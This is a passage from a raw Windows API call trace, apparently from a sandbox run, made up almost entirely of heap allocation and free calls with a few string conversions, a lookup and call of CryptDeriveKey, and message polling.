RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0132.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bf0 [0132.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.178] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0132.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0132.179] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0132.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0132.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0132.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0132.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0132.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0132.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0132.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0132.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0132.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0132.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0132.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0132.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0132.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0132.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0132.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0132.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0132.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a58 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0132.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0132.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0132.205] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, 